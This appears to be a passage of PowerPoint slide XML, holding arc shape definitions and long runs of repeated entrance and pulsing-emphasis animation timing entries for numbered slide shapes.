            <a:prstGeom prst="arc">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Arc 161"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1803400" y="3695701"/>
              <a:ext cx="558800" cy="4836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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1788160" y="3568702"/>
              <a:ext cx="711200" cy="636034"/>
            </a:xfrm>
            <a:prstGeom prst="arc">
              <a:avLst>
                <a:gd name="adj1" fmla="val 16200000"/>
                <a:gd name="adj2" fmla="val 376236"/>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2686944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0-#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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="40" dur="5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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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0-#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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="76" dur="5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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>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0-#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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="88" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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46"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="92" presetID="2" presetClass="entr" presetSubtype="8"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additive="base">
                                        <p:cTn id="94" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="100"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="95" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="100"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="96" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="97" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="100"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="100"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="99" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="100" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="101" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="102" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="103" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="104"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="106" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="107" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="108"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="108" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="108"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="109" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="108"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="110" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="111" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="108"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="112" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="108"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="113" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="114" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="112"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="115" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="112"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="116" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="112"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="117" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="112"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="119" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="112"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="120" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="121" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="122" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="123" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="124" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="125" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="126" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="116"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="127" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="128" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="120"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="129" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="120"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="130" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="120"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="131" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="132" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="120"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="133" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="120"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="134" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="135" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="124"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="136" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="124"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="137" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="124"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="138" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="139" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="124"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="140" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="124"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="141" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="142" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="128"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="143" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="128"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="144" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="128"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="145" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="indefinite" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="146" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="128"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="147" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="128"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="148" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="149" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="150" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
